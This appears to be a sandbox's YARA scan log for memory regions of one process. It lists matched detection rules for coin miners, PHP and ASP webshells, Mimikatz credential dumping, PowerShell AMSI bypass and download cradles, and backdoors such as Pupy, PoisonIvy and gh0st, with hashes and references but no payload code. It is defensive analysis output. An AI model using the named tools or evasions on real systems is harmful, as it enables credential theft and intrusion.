Source: 00000023.00000003.18307753022.0000015B1B767000.00000004.00000001.sdmp, type: MEMORY Matched rule: PS_AMSI_Bypass date = 2017-07-19, author = Florian Roth, description = Detects PowerShell AMSI Bypass, reference = https://gist.github.com/mattifestation/46d6a2ebb4a1f4f0e7229503dc012ef1, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = file
Source: 00000023.00000003.18431805767.0000015B1BFA6000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000023.00000003.18431805767.0000015B1BFA6000.00000004.00000001.sdmp, type: MEMORY Matched rule: WScriptShell_Case_Anomaly date = 2017-09-11, author = Florian Roth, description = Detects obfuscated wscript.shell commands, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000023.00000003.18431805767.0000015B1BFA6000.00000004.00000001.sdmp, type: MEMORY Matched rule: vanquish_2 author = Yara Bulk Rule Generator by Florian Roth, description = Webshells Auto-generated - file vanquish.exe, hash = 2dcb9055785a2ee01567f52b5a62b071
Source: 00000023.00000003.18305343223.0000015B1C4E5000.00000004.00000001.sdmp, type: MEMORY Matched rule: Pupy_Backdoor date = 2017-08-11, hash5 = 06bb41c12644ca1761bcb3c14767180b673cb9d9116b555680073509e7063c3e, hash4 = 20e19817f72e72f87c794843d46c55f2b8fd091582bceca0460c9f0640c7bbd8, hash3 = 90757c1ae9597bea39bb52a38fb3d497358a2499c92c7636d71b95ec973186cc, hash2 = 83380f351214c3bd2c8e62430f70f8f90d11c831695027f329af04806b9f8ea4, hash1 = ae93714203c7ab4ab73f2ad8364819d16644c7649ea04f483b46924bd5bc0153, author = Florian Roth, description = Detects Pupy backdoor, hash7 = 8784c317e6977b4c201393913e76fc11ec34ea657de24e957d130ce9006caa01, hash6 = be83c513b24468558dc7df7f63d979af41287e568808ed8f807706f6992bfab2, reference = https://github.com/n1nj4sec/pupy-binaries, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000023.00000003.18305343223.0000015B1C4E5000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000023.00000003.18433465792.0000015B1B723000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_asp_generic_eval_on_input date = 2021/01/07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function directly on user input, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 069ea990d32fc980939fffdf1aed77384bf7806bc57c0a7faaff33bd1a3447f6
Source: 00000023.00000003.18347582446.0000015B1B490000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000023.00000003.18341085023.0000015B1C4A2000.00000004.00000001.sdmp, type: MEMORY Matched rule: APT_MAL_Sandworm_Exaramel_Configuration_Key author = FR/ANSSI/SDO, description = Detects the encryption key for the configuration file used by Exaramel malware as seen in sample e1ff72[...
Source: 00000023.00000003.18341085023.0000015B1C4A2000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_gzinflated date = 2021/01/12, author = Arnim Rupp, description = PHP webshell which directly eval()s obfuscated string, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 49e5bc75a1ec36beeff4fbaeb16b322b08cf192d
Source: 00000023.00000003.18341085023.0000015B1C4A2000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000023.00000003.18341085023.0000015B1C4A2000.00000004.00000001.sdmp, type: MEMORY Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 00000023.00000003.18327508493.0000015B1B6A0000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_by_string_obfuscation date = 2021/01/09, author = Arnim Rupp, description = PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = e4a15637c90e8eabcbdc748366ae55996dbec926382220c423e754bd819d22bc
Source: 00000023.00000003.18327508493.0000015B1B6A0000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_asp_generic date = 2021/03/07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = a8c63c418609c1c291b3e731ca85ded4b3e0fba83f3489c21a3199173b176a75
Source: 00000023.00000003.18403655888.0000015B1B2C1000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_gzinflated date = 2021/01/12, author = Arnim Rupp, description = PHP webshell which directly eval()s obfuscated string, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 49e5bc75a1ec36beeff4fbaeb16b322b08cf192d
Source: 00000023.00000003.18403655888.0000015B1B2C1000.00000004.00000001.sdmp, type: MEMORY Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 00000023.00000003.18409201535.0000015B1B281000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_gzinflated date = 2021/01/12, author = Arnim Rupp, description = PHP webshell which directly eval()s obfuscated string, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 49e5bc75a1ec36beeff4fbaeb16b322b08cf192d
Source: 00000023.00000003.18409201535.0000015B1B281000.00000004.00000001.sdmp, type: MEMORY Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 00000023.00000003.18333278800.0000015B1AC5E000.00000004.00000001.sdmp, type: MEMORY Matched rule: WScript_Shell_PowerShell_Combo date = 2018-02-07, author = Florian Roth, description = Detects malware from Middle Eastern campaign reported by Talos, reference = http://blog.talosintelligence.com/2018/02/targeted-attacks-in-middle-east.html, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 15f5aaa71bfa3d62fd558a3e88dd5ba26f7638bf2ac653b8d6b8d54dc7e5926b
Source: 00000023.00000003.18410667523.0000015B1B2B1000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_gzinflated date = 2021/01/12, author = Arnim Rupp, description = PHP webshell which directly eval()s obfuscated string, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 49e5bc75a1ec36beeff4fbaeb16b322b08cf192d
Source: 00000023.00000003.18410667523.0000015B1B2B1000.00000004.00000001.sdmp, type: MEMORY Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 00000023.00000003.18307169245.0000015B1A4C3000.00000004.00000001.sdmp, type: MEMORY Matched rule: Mimikatz_Memory_Rule_1 date = 12/22/2014, author = Florian Roth, description = Detects password dumper mimikatz in memory (False Positives: an service that could have copied a Mimikatz executable, AV signatures), license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = memory
Source: 00000023.00000003.18324208366.0000015B1BE5C000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_by_string_obfuscation date = 2021/01/09, author = Arnim Rupp, description = PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = e4a15637c90e8eabcbdc748366ae55996dbec926382220c423e754bd819d22bc
Source: 00000023.00000003.18311556427.0000015B1BE5C000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_by_string_obfuscation date = 2021/01/09, author = Arnim Rupp, description = PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = e4a15637c90e8eabcbdc748366ae55996dbec926382220c423e754bd819d22bc
Source: 00000023.00000003.18291256000.0000015B1B9B9000.00000004.00000001.sdmp, type: MEMORY Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: 00000023.00000003.18321252333.0000015B1B6A0000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_by_string_obfuscation date = 2021/01/09, author = Arnim Rupp, description = PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = e4a15637c90e8eabcbdc748366ae55996dbec926382220c423e754bd819d22bc
Source: 00000023.00000003.18321252333.0000015B1B6A0000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_asp_generic date = 2021/03/07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = a8c63c418609c1c291b3e731ca85ded4b3e0fba83f3489c21a3199173b176a75
Source: 00000023.00000003.18427196191.0000015B1AB46000.00000004.00000001.sdmp, type: MEMORY Matched rule: korlia author = Nick Hoffman, reference = http://www.morphick.com/resources/lab-blog/curious-korlia, company = Morphick, information = korlia malware found in apt dump
Source: 00000023.00000003.18307459590.0000015B1A504000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000023.00000003.18332888598.0000015B1C174000.00000004.00000001.sdmp, type: MEMORY Matched rule: CredTheft_MSIL_ADPassHunt_2 author = FireEye, reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = 6efb58cf54d1bb45c057efcfbbd68a93
Source: 00000023.00000003.18337113449.0000015B1BB10000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_asp_generic_eval_on_input date = 2021/01/07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function directly on user input, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 069ea990d32fc980939fffdf1aed77384bf7806bc57c0a7faaff33bd1a3447f6
Source: 00000023.00000003.18429220503.0000015B1A3C2000.00000004.00000001.sdmp, type: MEMORY Matched rule: SUSP_PowerShell_IEX_Download_Combo date = 2018-10-04, hash1 = 13297f64a5f4dd9b08922c18ab100d3a3e6fdeab82f60a4653ab975b8ce393d5, author = Florian Roth, description = Detects strings found in sample from CN group repo leak in October 2018, reference = https://twitter.com/JaromirHorejsi/status/1047084277920411648
Source: 00000023.00000003.18429220503.0000015B1A3C2000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_generic date = 2021/01/14, author = Arnim Rupp, description = php webshell having some kind of input and some kind of payload. restricted to small files or big ones inclusing suspicious strings, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = bee1b76b1455105d4bfe2f45191071cf05e83a309ae9defcf759248ca9bceddd
Source: 00000023.00000003.18429220503.0000015B1A3C2000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_generic_eval date = 2021/01/07, author = Arnim Rupp, description = Generic PHP webshell which uses any eval/exec function in the same line with user input, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 90c5cc724ec9cf838e4229e5e08955eec4d7bf95
Source: 00000023.00000003.18429220503.0000015B1A3C2000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_dynamic_big date = 2021/02/07, author = Arnim Rupp, description = PHP webshell using $a($code) for kind of eval with encoded blob to decode, e.g. b374k, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000023.00000003.18429220503.0000015B1A3C2000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_asp_generic_eval_on_input date = 2021/01/07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function directly on user input, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 069ea990d32fc980939fffdf1aed77384bf7806bc57c0a7faaff33bd1a3447f6
Source: 00000023.00000003.18429220503.0000015B1A3C2000.00000004.00000001.sdmp, type: MEMORY Matched rule: ChinaChopper_Generic date = 2015/03/10, author = Florian Roth, description = China Chopper Webshells - PHP and ASPX, reference = https://www.fireeye.com/content/dam/legacy/resources/pdfs/fireeye-china-chopper-report.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000023.00000003.18325191461.0000015B1BE9F000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000023.00000003.18402637724.0000015B1B2C1000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_gzinflated date = 2021/01/12, author = Arnim Rupp, description = PHP webshell which directly eval()s obfuscated string, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 49e5bc75a1ec36beeff4fbaeb16b322b08cf192d
Source: 00000023.00000003.18402637724.0000015B1B2C1000.00000004.00000001.sdmp, type: MEMORY Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 00000023.00000003.18430797596.0000015B1AE5D000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000023.00000003.18430797596.0000015B1AE5D000.00000004.00000001.sdmp, type: MEMORY Matched rule: PoisonIvy_3 filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, cape_type = PoisonIvy Payload, ref = http://malwareconfig.com/stats/PoisonIvy
Source: 00000023.00000003.18297289690.0000015B1BCD0000.00000004.00000001.sdmp, type: MEMORY Matched rule: APT_Backdoor_Win_GoRat_Memory author = FireEye, description = Identifies GoRat malware in memory based on strings., reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = 3b926b5762e13ceec7ac3a61e85c93bb
Source: 00000023.00000003.18326506118.0000015B1A705000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_jsp_by_string date = 2021/01/09, author = Arnim Rupp, description = JSP Webshells which contain unique strings, lousy rule for low hanging fruits. Most are catched by other rules in here but maybe these catch different versions., license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 06b42d4707e7326aff402ecbb585884863c6351a
Source: 00000023.00000003.18316647369.0000015B1B557000.00000004.00000001.sdmp, type: MEMORY Matched rule: hacktool_macos_keylogger_logkext author = @mimeframe, description = LogKext is an open source keylogger for Mac OS X, a product of FSB software., reference = https://github.com/SlEePlEs5/logKext
Source: 00000023.00000003.18316647369.0000015B1B557000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_dynamic_big date = 2021/02/07, author = Arnim Rupp, description = PHP webshell using $a($code) for kind of eval with encoded blob to decode, e.g. b374k, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000023.00000003.18348306594.0000015B1B176000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000023.00000003.18286213062.0000015B1A381000.00000004.00000001.sdmp, type: MEMORY Matched rule: Hacktool_Strings_p0wnedShell date = 2017-01-14, hash1 = e1f35310192416cd79e60dba0521fc6eb107f3e65741c344832c46e9b4085e60, author = Florian Roth, description = p0wnedShell Runspace Post Exploitation Toolkit - file p0wnedShell.cs, reference = https://github.com/Cn33liz/p0wnedShell, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000023.00000003.18286213062.0000015B1A381000.00000004.00000001.sdmp, type: MEMORY Matched rule: Mimikatz_Memory_Rule_1 date = 12/22/2014, author = Florian Roth, description = Detects password dumper mimikatz in memory (False Positives: an service that could have copied a Mimikatz executable, AV signatures), license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = memory
Source: 00000023.00000003.18286213062.0000015B1A381000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000023.00000003.18302210268.0000015B1AF24000.00000004.00000001.sdmp, type: MEMORY Matched rule: Oilrig_IntelSecurityManager_macro date = 2018-01-19, author = Eyal Sela (slightly modified by Florian Roth), description = Detects OilRig malware, reference = Internal Research
Source: 00000023.00000003.18417425467.0000015B1B2B1000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_gzinflated date = 2021/01/12, author = Arnim Rupp, description = PHP webshell which directly eval()s obfuscated string, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 49e5bc75a1ec36beeff4fbaeb16b322b08cf192d
Source: 00000023.00000003.18417425467.0000015B1B2B1000.00000004.00000001.sdmp, type: MEMORY Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 00000023.00000003.18317322207.0000015B1B5DB000.00000004.00000001.sdmp, type: MEMORY Matched rule: ZxShell_Jul17 date = 2017-07-08, hash1 = 5d2a4cde9fa7c2fdbf39b2e2ffd23378d0c50701a3095d1e91e3cf922d7b0b16, author = Florian Roth, description = Detects a ZxShell - CN threat group, reference = https://blogs.rsa.com/cat-phishing/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000023.00000003.18285687047.0000015B1B29A000.00000004.00000001.sdmp, type: MEMORY Matched rule: CVE_2018_4878_0day_ITW Description = This signature is mostly public sourced and detects an in-the-wild exploit for CVE-2018-4878., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000023.00000003.18336414128.0000015B1BF22000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000023.00000003.18425422653.0000015B1C5EB000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000023.00000003.18418037701.0000015B1B2C1000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_gzinflated date = 2021/01/12, author = Arnim Rupp, description = PHP webshell which directly eval()s obfuscated string, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 49e5bc75a1ec36beeff4fbaeb16b322b08cf192d
Source: 00000023.00000003.18418037701.0000015B1B2C1000.00000004.00000001.sdmp, type: MEMORY Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 00000023.00000003.18418460951.0000015B1B2C1000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_gzinflated date = 2021/01/12, author = Arnim Rupp, description = PHP webshell which directly eval()s obfuscated string, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 49e5bc75a1ec36beeff4fbaeb16b322b08cf192d
Source: 00000023.00000003.18418460951.0000015B1B2C1000.00000004.00000001.sdmp, type: MEMORY Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 00000023.00000003.18290582002.0000015B1BF65000.00000004.00000001.sdmp, type: MEMORY Matched rule: TA17_293A_malware_1 date = 2017/07/17, hash5 = 038A97B4E2F37F34B255F0643E49FC9D, hash4 = 04738CA02F59A5CD394998A99FCD9613, hash3 = 8943E71A8C73B5E343AA9D2E19002373, hash2 = BA756DD64C1147515BA2298B6A760260, hash1 = A07AA521E7CAFB360294E56969EDA5D6, hash0 = 61C909D2F625223DB2FB858BBDF42A76, author = US-CERT Code Analysis Team (modified by Florian Roth), description = inveigh pen testing tools & related artifacts, hash10 = 4595DBE00A538DF127E0079294C87DA0, hash9 = 722154A36F32BA10E98020A8AD758A7A, hash8 = 5DBEF7BDDAF50624E840CCBCE2816594, hash7 = AA905A3508D9309A93AD5C0EC26EBC9B, hash6 = 65A1A73253F04354886F375B59550B46, reference = https://www.us-cert.gov/ncas/alerts/TA17-293A
Source: 00000023.00000003.18290582002.0000015B1BF65000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000023.00000003.18340382300.0000015B1BB10000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_asp_generic_eval_on_input date = 2021/01/07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function directly on user input, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 069ea990d32fc980939fffdf1aed77384bf7806bc57c0a7faaff33bd1a3447f6
Source: 00000023.00000003.18418909373.0000015B1B2C1000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_gzinflated date = 2021/01/12, author = Arnim Rupp, description = PHP webshell which directly eval()s obfuscated string, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 49e5bc75a1ec36beeff4fbaeb16b322b08cf192d
Source: 00000023.00000003.18418909373.0000015B1B2C1000.00000004.00000001.sdmp, type: MEMORY Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 00000023.00000003.18426294063.0000015B1BD11000.00000004.00000001.sdmp, type: MEMORY Matched rule: ZxShell_Jul17 date = 2017-07-08, hash1 = 5d2a4cde9fa7c2fdbf39b2e2ffd23378d0c50701a3095d1e91e3cf922d7b0b16, author = Florian Roth, description = Detects a ZxShell - CN threat group, reference = https://blogs.rsa.com/cat-phishing/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000023.00000003.18426294063.0000015B1BD11000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000023.00000003.18426294063.0000015B1BD11000.00000004.00000001.sdmp, type: MEMORY Matched rule: gh0st author = https://github.com/jackcr/
Source: 00000023.00000003.18320914162.0000015B1B65F000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_gzinflated date = 2021/01/12, author = Arnim Rupp, description = PHP webshell which directly eval()s obfuscated string, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 49e5bc75a1ec36beeff4fbaeb16b322b08cf192d
Source: 00000023.00000003.18320914162.0000015B1B65F000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_dynamic_big date = 2021/02/07, author = Arnim Rupp, description = PHP webshell using $a($code) for kind of eval with encoded blob to decode, e.g. b374k, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000023.00000003.18320914162.0000015B1B65F000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000023.00000003.18309001390.0000015B1AF24000.00000004.00000001.sdmp, type: MEMORY Matched rule: Oilrig_IntelSecurityManager_macro date = 2018-01-19, author = Eyal Sela (slightly modified by Florian Roth), description = Detects OilRig malware, reference = Internal Research
Source: 00000023.00000003.18347963996.0000015B1BF22000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000023.00000003.18428517155.0000015B1C06B000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000023.00000003.18426595439.0000015B1BB86000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000023.00000003.18340030081.0000015B1AB4D000.00000004.00000001.sdmp, type: MEMORY Matched rule: Tofu_Backdoor date = 2017-02-28, author = Cylance, description = Detects Tofu Trojan, reference = https://www.cylance.com/en_us/blog/the-deception-project-a-new-japanese-centric-threat.html
Source: 00000023.00000003.18327176542.0000015B1B61C000.00000004.00000001.sdmp, type: MEMORY Matched rule: xtremrat date = 2012-07-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Xtrem RAT v3.5, version = 1.0
Source: 00000023.00000003.18428865493.0000015B1A381000.00000004.00000001.sdmp, type: MEMORY Matched rule: Base64_PS1_Shellcode date = 2018-11-14, author = Nick Carr, David Ledbetter, description = Detects Base64 encoded PS1 Shellcode, reference = https://twitter.com/ItsReallyNick/status/1062601684566843392, score =
Source: 00000023.00000003.18428865493.0000015B1A381000.00000004.00000001.sdmp, type: MEMORY Matched rule: Pupy_Backdoor date = 2017-08-11, hash5 = 06bb41c12644ca1761bcb3c14767180b673cb9d9116b555680073509e7063c3e, hash4 = 20e19817f72e72f87c794843d46c55f2b8fd091582bceca0460c9f0640c7bbd8, hash3 = 90757c1ae9597bea39bb52a38fb3d497358a2499c92c7636d71b95ec973186cc, hash2 = 83380f351214c3bd2c8e62430f70f8f90d11c831695027f329af04806b9f8ea4, hash1 = ae93714203c7ab4ab73f2ad8364819d16644c7649ea04f483b46924bd5bc0153, author = Florian Roth, description = Detects Pupy backdoor, hash7 = 8784c317e6977b4c201393913e76fc11ec34ea657de24e957d130ce9006caa01, hash6 = be83c513b24468558dc7df7f63d979af41287e568808ed8f807706f6992bfab2, reference = https://github.com/n1nj4sec/pupy-binaries, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
